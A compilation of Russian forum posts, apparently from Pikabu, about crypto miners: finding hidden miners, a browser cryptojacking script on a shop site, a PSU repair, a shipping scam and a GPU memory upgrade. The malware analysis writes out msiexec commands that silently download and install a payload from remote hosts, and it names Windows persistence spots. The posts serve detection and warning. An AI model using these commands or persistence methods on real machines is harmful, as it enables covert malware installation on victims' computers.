Вы это серьёзно? )))))))
Решил комп почистить, убрать из автозапуска лишнее. А тут...
Ответ на пост «Как я скрытый майнер искал»
Есть такая классная встроенная в винду штука - монитор ресурсов. Там есть первая вкладка "Обзор". Так вот, ее "классность" в том, что в отличии от диспетчера задач она продолжает показывать завершенные процессы, статус у них "Прерван". У меня эта штука постоянно открыта. Если слышу, что ноут загудел - смотрю в первую очередь в прерванные процессы. Там, как правило тусят виндовые "бекграунд таск" хост процессы, которые винда быстро прибивает как только видит активность пользователя. Как собсно майнеры и делают. ;)
Как я скрытый майнер искал
Приветствую тех, кто читает. Сижу значит никого не трогаю, вдруг начинает кулер процессорный шуметь. Понимаю, что кто то начал загружать мой процессор. Ну я бегом в диспетчер задач, а там пусто и кулер затих. Через какое-то время ситуация повторяется. Понял, что вирус поймал. Скачал drweb cureit и adw cleaner - результата ноль. Поиск в интернетах результата не дал. Значит будем руками искать.
Для начала глянул в автозапуск и планировщик задач - ничего подозрительного.
Зашел в process explorer и обнаружил такого зверя:
Командная строка, которая постоянно перезапускается, причем с таймаутом, как будто чего-то ждет. Заходим в свойства cmd.exe и видим:
Командая строка запускается с параметром, ведущим к некому DataTM.cmd. Вот код, который лежит в батнике:
А вот и файлы в папке с ним:
XMR майнер. Маскируется в процессах под steam я так понимаю и вырубается как только был включен taskmgr или похожие "диспетчеры задач".
Это не значит, что все майнеры так прячутся, но как один из вариантов. Надеюсь кому-то поможет.
Вот ",,,," если где забыл поставить.
Железный биткоин. Часть 1
Принесли в ремонт майнер, накрылся блок питания.
Блок питания там стоит вполне серьезный, более 2 квт мощности.
Выход один - 14 вольт 145 ампер.
Второй выход - служебный.
Состояние - бабахнул!
Собран по схеме с корректором мощности.
Разобрал, продефектовал.
Пробиты транзисторы преобразователя, входной мост, корректор мощности, диод в цепи реле и пара резисторов смд 1206 размера.
Состояние микросхем пока непонятно.
Суд по размерам радиаторов, а они безбожно мелкие как и вентиляторы, для такой мощности, силовые компоненты должны быть очень высокого уровня.
Транзисторы MOSFET применены такие:
OSG55R030HZ
Корпус -TO247
Напряжение - 550V
Ток - 80 A
Сопротивление канала - 0.028 ом
Мост выпрямительный стандартный 3510
Вернемся к транзисторам.
Транзисторы непростые , а с очень низким сопротивлением канала.
И именно этот факт позволяет качать указанную мощность в 2 квт без особых мер охлаждения.
Но вот купить эти транзисторы или заменить на аналог оказалось не совсем просто.
Аналоги с такими характеристиками стоят от 3500 руб. за штуку.
Поэтому продолжение истории - результат ремонта этого блока питания - будет уже во второй части, после того как получу все необходимые для ремонта компоненты.
Вероятно - в конце февраля.
Самый крупный китайский развод на моей памяти
Занимаюсь доставкой из Китая, живу в Китае. И я представляю вашему вниманию самый крупный развод на моей памяти:
Был у меня клиент, возили разную электронику, объемы неплохие, все шло хорошо. Пока в прошлом году не случилась эта «золотая лихорадка» - надо брать биткоин, надо майнить!
Началось все с видеокарт летом, а к осени вовсю возили майнеры. Особенность доставки майнеров в том, что они очень дорогие, бОльшую часть стоимости доставки составляет страховка. Потерял груз, украли в пути - нужно возмещать клиенту всю стоимость. Большие деньги и большой риск. Каждый грузчик знал, что если тут майнеры - значит речь идёт о нескольких тысячах долларов за штуку. Надо пиздить!
Соответственно, только за страховку майнеров мы брали 6% от стоимости. Неплохие деньги. Но и потерять можно не мало, если товар пропадёт по пути.
Решил мой клиент тоже привезти в Россию майнеры. Начали разговаривать - я назвал стоимость доставки и страховки. Ну что-то он ни туда ни сюда, вроде дорого, давай дешевле. Я отказался.
Нашёл он надежную транспортную (Карго) в Шенчжене, знакомые советуют, канал на ютубе есть, русский парень там работает - вроде как можно верить. Ну ладно, его выбор.
Приехал в Китай, познакомился с поставщиками у которых майнеры в наличии, познакомился со своей новой Карго компанией, как полагается. Взял пробную партию - 10 штук. Заплатил биткоинами. А в то время (да и сейчас) многие поставщики в Шенчжене оплату биткоинами брали - с производителем нужно биткоинами рассчитываться.
Товар отдал в свою новую надежную транспортную, через две недели все в Москве, все отлично - схема работает, люди надежные, за страховку берут не 6%, как мы, а всего лишь 1%. Сэкономил.
Наступает ноябрь 2017, цены на криптовалюту растут, майнеры хрен найдёшь - разбирают как горячие пирожки. Раньше купишь - раньше начнёшь майнить.
Короче он подрывается, напрягается, находит деньги, берет кредиты, выводит из оборота, у друзей занимает - заказывает 100 майнеров. На сумму что-то около $350 000.
Звонит мне. Алексей, говорит, мы с тобой давно работаем, сумма большая, давай отвези майнеры, там 100 штук. Давай страховку хоть 2%? Я отказался, риск большой. Опять говорю - 6%.
Да ты там охренел, $20 000 с меня хочешь срубить, да с пустого места, да пошёл ты на хер! Ну и ладно, мне же спокойнее спать.
Платит он опять биткоинами поставщику. Договариваться на доставку, новая надежная транспортная - даёт добро, ждём товар.
Проходит три дня. Поставщик скидывает ему фотки - вот 100 штук, отгрузили, вот машина, вот фотка у склада твоей транспортной - все сделали.
Звонит в транспортную - товар они не получали... нет говорят, никто ничего не привозил.
Опять звонит поставщику - те говорят отвезли, вот бумажка типа - вот в ней кто-то расписался, товар приняли.
Звонит своему русскому парню, которой в этой Карго работает - получали товар? Нет, не получали.
Чья подпись на бумажке? Да хз чья, ничего не знаем.
Круг замкнулся, где майнеры - никто не знает.
Срывается прилетает в Китай. Идёт в транспортную - те сидят спокойно чай пьют - ничего не привозили. Пригоняет к поставщику - те тоже сидят чай попивают - все отгрузили вот бумажка, вот фотки. Причём фоток разгрузки нет.
Звонит мне и рассказывает всю эту историю. Приезжай говорит, пойдём в полицию, пошли весь город на уши поднимем, спиздили! Я не поехал, понятно что ничего там не добьёмся - с майнерами кидали направо и налево. Когда мы договаривались что я повезу - я обязательно указывал что лично поеду, лично загружу, партия большая. Оплати дорогу и тд - он же мне говорил что я охуел и ещё дорогу и гостиницу мне оплачивать.
Я живу в Иу, до Шенчженя ехать далеко, 1200 км, поэтому.
Потом звонил снова, рассказывал. Пошёл в полицию всё-таки. В Китае же камеры везде - можно доказать что угодно, куда машина ехала, разгружалась или нет и так далее.
Первое что его попросили - контракт, инвойс, факт оплаты и факт сделки доказать.
Как платил? - Биткоинами....
Где контракт? - Ну вот, в почте файл...
Понятно, всего вам доброго, до свидания, хорошего настроения, здоровья и держитесь там - вот краткий ответ полиции. Камеры смотреть нет оснований даже.
Факта сделки юридически не было. Потом звонил мне ещё много раз, просил бандитов каких найти, на ножи там всех поставить, истерика - но я же в триадах не состою, чем могу помочь? Ничем. Сэкономил? Молодец. $350 000 ушли в зрительный зал.
А клиент пропал. С весны не пишет, не звонит. Сотовый заблокирован, сайт не работает...
Пока писал, ещё три истории про кидалово с майнерами вспомнил, завтра напишу.
Мой канал в Телеграм: https://t.me/chinabackdoor
Апгрейд GTX1060 3Gb до 6Gb
Всем привет, давненько попадался здесь же пост о ремонте и апгрейде GTX1060, правда там в итоге все свелось к тому что на чистый текстолит из под GP106-300 посадили чип GP106-400 и набор банок памяти на 6 гигов. Но думаю многих интересует немного другой апгрейд :)
Благодаря товарищам майнерам периодически достаются всякие разной степени исправности видюхи, и вот прибыл такой экземпляр MSI GTX1060 AERO ITX 3G OC
Карта в целом сразу было понятно что не жилец, т.к. ампутировав одну фазу, останется только две и каши с этим не сваришь. По этому решено было поэкспериментировать с ней. После непродолжительной работы феном и дремелем, получаем вот такую красоту.
Карта успешно запускается и работает, но как и ожидалось, чем меньше фаз - тем они становятся менее эффективны и даже с поверлимитом 60% зона VRM разогревается под 80+ градусов.
В общем переходим к самому интересному, давно лежала в коробке горелая (спасибо опять майнерам да :) ) плата от GTX 1070, с которой GPU уже ушел на другой живой текстолит, а вот 100% рабочая память осталась, снимаем ее, реболлим.
Маркировка этих чипов памяти K4G80325FB-HC25, по 8Гбит.
Снимаем с платы 1060 чипы K4G41325FE-HC25 по 4Гбит и готовим посадочное место
И вот тут должна была бы быть фотка как я красиво припаял новую память, но почему-то я забыл ее сделать и побежал скорее тестировать что получилось. После таких манипуляций видюха запустилась как и раньше определив 3Гб памяти, ну, работает - уже хорошо.
Далее полез в инет листать обзорчики брата близнеца этой платы но с 6Гб, и разглядывать как же там установлены страпы на этих картах.
В оригинале 3Гб было так:
А на 6Гб версии выставлены так:
т.е. сдвинуты R91->R84, R94->R86, R93->R85, загружаемся в систему, и та-дам:
Получаем GTX 1060 3GB c 6Гб памяти. Побегал на ней в игрушках, все 6 гигов используются, никаких проблем нет. Дополнительные ядра конечно не отросли :)
Ради интереса попробовал прошить биос от 6Гб версии, но карта отказалась запускаться.
В целом пост был про возможность апгрейда, может конечно это давно известный факт про 1060, но видюшками занимаюсь не часто, сходу не попалось инфы такой.
Далее, т.к. видеокарта о двух фазах на гпу категорически не устраивает, то весь комплект гпу+чипы памяти снял с этой платы и запаял на имевшуюся пустую плату от Palit 1060 Dual/StromX, и вот тут ждала интересная засада. Со страпами от 3Гб карта запускалась нормально и работала с 3 гигами отлично, но вот установив страпы как на палите 6Гб карта после установки драйверов начала сыпать артефактами и сбрасывать драйвер.
Первая мысль, ну может у палита биос как-то не дружит, зашил дамп с той MSI где изначально запустил, ага драйвера поставились, но вот беда, карта не может прыгнуть выше 139 МГц по ядру и постоянно показывает что уперлась в поверлимит.
Беглый осмотр подтверждает догадки, у палита в отличии от кучи других карт перепутаны местами каналы мониторинга в микросхеме INA3221. Ради теста быстренько мастерим вот такую порнографию:
И картина не меняется, по прежнему артефакты, хотя вот этот же комплект биоса/гпу/памяти на соседнем текстолите работал как часы.
В общем после некоторого времени вызванивания страпов (хорошо рядом еще один такой палит был без чипа) и сравнения с платой MSI, оказалось что один страп на 6гб Palit стоял не там где у MSI, передвинув его все запустилось и на биосе от палита без лишнего колхоза вокруг INA3221.
Если кто вдруг будет повторять увиденное на платах палита, то вот конфигурация страпов для такого случая:
О том, как я крипту зарабатывал... для других
Подыскивал я очередную ардуину... Захожу я на сайт mgbot.ru, который торгует всякой электроникой и появляется чувство некоторого торможения...
(для ленивых - /bitrix/js/main/core/core_loader.js с сайта в ~75% случаев подгружает майнер)
Проверяюсь - по SHIFT+ESC в Хроме есть свой диспетчер задач. Красота - все 4 ядра процессора почти целиком забиты полезной деятельностью, только мне немного оставили, чтоб казалось, что всё в порядке.
Полез к диспетчеру задач, может быть зря переживаю?
А нет... не зря... Ну что, лунная клизма призма, а нет, ИНСТРУМЕНТЫ РАЗРАБОТЧИКА (F12) дайте мне силы!
Наблюдаются непонятные процессы, которые у честных сайтов обычно отсутствуют в принципе. Как выяснилось - подгружается WASM сборка, которая делает что-то.
Знаем имя файла, можем на вкладке сети посмотреть - кто его вызвал. Какое чудесное имя вызывает эти странные нагрузки - crypta.js, а откуда оно появилось?
Файл crypta.js содержит исключительно не подозрительный текст (пжалте ссылочку - https://reauthenticator.com/lib/crypta.js?w=2028 ) . А вызывается это счастье из https://mgbot.ru/bitrix/js/main/core/core_loader.js?v=0.3.1, который скорей всего входит в типовой набор файлов сайта на битриксе, что как бы намекает, что бедный несчастный программист, живя впроголодь, решил немного обогатиться за счет работой-дателя и всех, у кого есть браузер, имевших несчастье попасть на сайт и дописал несколько строк.
Что же происходит внутри?
1. Случайное число до 4 выбирает, чем мы будем заниматься. Если 1 - то честная деятельность чего-то там, а вот 2-3-4, или если в воздухе повиснет - начинаем обогащать разные кошельки, если я правильно понял текст:
06d93b846706f4dca9996baa15d4d207e82d1e86676c
ef937f99557277ff62a6fc0e5b3da90ea9550ebcdfac
dd27d0676efdecb12703623d6864bbe9f4e7b3f69f2e
2. Подгружается JS-скрипт, который оглядывается в компьютере и начинает полезную деятельность.
Сохранил я этот файл на компьютере, отдал посмотреть VirusTotal, а он и говорит - всего-лишь подозрительное нечто, да и то по мнению только двух антивирусов.
https://www.virustotal.com/#/file/90c563eabc9347d722f65d80c7...
https://www.virustotal.com/#/file/3cc8131d6f631367a77d8e8f07...
Посмотрим на авторов crypta.js - сайт reauthenticator.com перекидывает на:
Кажется тут уже можно остановиться.
Мораль?
1. Программисты тоже бедные люди
2. Если сделал программист доброе дело, ты проверь и выкинь лишнее.
Авторам сайта извещение ушло. Кто хочет приобщиться к криптовалюте бесплатно без смс и установки дополнительных программ - заходите :)
Криптоджекинг. Разбор случайного вируса-майнера под Windows.
Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):
В автозагрузке, повторюсь всё в порядке:
После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.
Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):
В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:
Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:
И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:
Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:
Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:
Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:
Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:
Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:
Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:
Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:
Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:
Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:
Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:
Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":
Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).
Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.